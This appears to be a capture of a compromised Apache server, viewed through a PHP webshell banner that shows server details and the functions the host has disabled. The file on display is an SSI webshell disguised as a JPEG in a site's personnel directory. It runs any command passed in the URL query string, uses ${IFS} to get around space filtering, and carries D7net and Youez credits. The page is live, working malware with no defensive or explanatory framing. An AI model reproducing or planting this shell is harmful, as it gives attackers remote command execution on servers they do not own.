403Webshell
Server IP : 27.254.66.5  /  Your IP : 216.73.217.39
Web Server : Apache/2
System : Linux cs82.hostneverdie.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
User : technic2 ( 1951)
PHP Version : 7.4.30
Disable Function : apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd,exec, fp, fput, highlight_file, ini_alter, ini_restore, inject_code, passthru,phpAds_remoteInfo, phpAds_XmlRpc,phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid,posix_setuid, posix_setuid, posix_uname,proc_open,proc_close, proc_get_status, proc_nice, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode, show_source,sleep,pcntl_exec,virtual,suexec,dbmopen,dl,symlink,disk_free_space,diskfreespace,leak
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/technic2/public_html/personnel/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/technic2/public_html/personnel/ess.shtml
     JFIF        
<!--#config errmsg="[ERROR] SSI DISABLED"-->
<!--#set var="zero" value="" -->
<!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" -->
<!--#set var="shl" value="id" -->
<!--#else -->
<!--#set var="shl" value=$QUERY_STRING_UNESCAPED -->
<!--#endif -->
<!DOCTYPE html>
<html>
<head>
<title>ESESI</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script language="javascript">
function opetcmd()
{
  var uri = document.getElementById('command').value;
    var rep = uri.replace(/[ ]/g,'${IFS}');
    var res = encodeURI(uri);
    document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep);
}
</script>
<style type="text/css">
body {
        text-shadow:0px 0px 1px #757575;
        background-color: darkslateblue;
        background-size: cover;
        background-attachment: fixed;
        background-repeat: no-repeat;
    }
    .directory-listing-table {
      margin: auto;
      background-color: rgb(0 0 0 / 57%);
      padding: .6rem 1rem;
      max-width: 1100px;
      width: 65%;
      border-radius: .75rem;
      border: 2px solid darkslateblue;
      box-shadow: 0 0 20px black;
    }
    thead, tr, td {
        border-collapse:collapse;
        background: transparent;
        font-size: 13px;
        color: #fff;
    }
    input[type=text] {
        width: 50%;  
        background: rgba(0,0,0,0.3);
        border: none;
        outline: none;
        padding: 5px;
        font-size: 12px;
        color: #fff;
        text-shadow: 1px 1px 1px rgba(0,0,0,0.3);
        border: 1px solid rgba(0,0,0,0.3);
        border-radius: 4px;
        box-shadow: inset 0 -5px 45px rgba(100,100,100,0.2), 0 1px 1px rgba(255,255,255,0.2);
        -webkit-transition: box-shadow .5s ease;
        -moz-transition: box-shadow .5s ease;
        -o-transition: box-shadow .5s ease;
        -ms-transition: box-shadow .5s ease;
        transition: box-shadow .5s ease;
    }
    .pencet {
        background-color: rgb(0 0 0 / 57%);
        color: #fff;
        border-color: blanchedalmond;
    }
textarea {
    border: 1px solid #ffffff;
    width: 100%;
    height: 340px;
    padding-left: 2px;
    resize: none;
    overflow: auto;
    color: #fff;
    text-shadow: 1px 1px 1px rgba(0,0,0,0.3);
    border: 1px solid rgba(0,0,0,0.3);
    border-radius: 4px;
    box-shadow: inset 0 -5px 45px rgba(100,100,100,0.2), 0 1px 1px rgba(255,255,255,0.2);
    -webkit-transition: box-shadow .5s ease;
    -moz-transition: box-shadow .5s ease;
    -o-transition: box-shadow .5s ease;
    -ms-transition: box-shadow .5s ease;
    transition: box-shadow .5s ease;
    background: rgba(0,0,0,0.3);
}
textarea::-webkit-scrollbar {
  width: 12px;
}

textarea::-webkit-scrollbar-track {
  background: #000000;
}

textarea::-webkit-scrollbar-thumb {
  background-color: darkslateblue;
  border: 3px solid black;
}
body, a, a,:link{cursor:url(http://4.bp.blogspot.com/-hAF7tPUnmEE/TwGR3lRH0EI/AAAAAAAAAs8/6pki22hc3NE/s1600/ass.png), 
    default;
} 
    button, input, select, a:hover {
    cursor:url(http://3.bp.blogspot.com/-bRikgqeZx0Q/TwGR4MUEC7I/AAAAAAAAAtA/isJmS0r35Qw/s1600/pointer.png),
    wait;
}
</style>
</head>
<table class="directory-listing-table"><thead><td>
  <font face="courier">
    <br><br>System : <b><font color="orange"><!--#exec cmd="{uname,-nrv}" --></font></b>
    <br>Software : <b><font color="orange"><!--#echo var="SERVER_SOFTWARE" --></font></b>
    <br>Server Ip : <b><font color="orange"><!--#echo var="SERVER_ADDR" --></font></b>
    <br>Current Dir : <b><font color="orange"><!--#echo var=DOCUMENT_ROOT --></font></b><br>
Wget : <b><font color="orange"><!--#exec cmd="{test,-e,/usr/bin/wget}&&{echo,ON}||{echo,OFF}" --></font></b> |
Curl : <b><font color="orange"><!--#exec cmd="{test,-e,/usr/bin/curl}&&{echo,ON}||{echo,OFF}" --></font></b>
<br><br>
    <input type="text" size="30" placeholder="uname -a" id="command" class="text" name="address1" style="max-width: 100%; max-height: 100%;">&nbsp;
    <br><br><button class="pencet" style="width:120px;height:30px;" id="crot" onclick="opetcmd();">execute</button><br><br>
Command : </font><b><font face="courier" color="orange" id="cmd"><!--#echo var=shl --></font></b></i>
<pre><textarea style="color:lime;" readonly><!--#exec cmd=$shl --></textarea></pre>
<script>
  var cmd = document.getElementById("cmd").innerHTML.split("${IFS}").join(" ");
    document.getElementById("cmd").innerHTML = cmd;
    var gaskan = document.getElementById("command");
    gaskan.addEventListener("keyup", function(event) {
      if (event.keyCode === 13) {
        event.preventDefault();
        document.getElementById("crot").click();
    }
});
</script>
</td></thead></table><br>
<table class='directory-listing-table'><thead><td><center><font face="courier" size="2">Created By D7net &copy; 2023 - <a href='http://opetolol.eu.org/' target='_blank'></font><font size="2" color="orange">opetolol.eu.org</font></a></center></td></thead></table>
</center></td></thead></table>
</html>






			



		


   C
	
                          "           #Qr                    &         1! A"2qQa      ?  y, /3J ݹ ߲؋5 Xw   y R  I0 2 PI I  iM    r N&"KgX:    nTJnLK  @! -    m ; g   & hw   @ ܗ9 - . 1<y    Q U ہ?.    b߱ ֫ w*V  ) $  b ԟ  X - T  G 3 g     Jx   U/  v_s(H  @T J    n  ! gfb c : l[ Qe9 PLb  C m[5  ' j gl   _   l-;"Pk   Q _ ^ S   x?"   Y騐 O 	q ~~ t U Cڒ V		I1  _  

Youez - 2016 - github.com/yon3zu
LinuXploit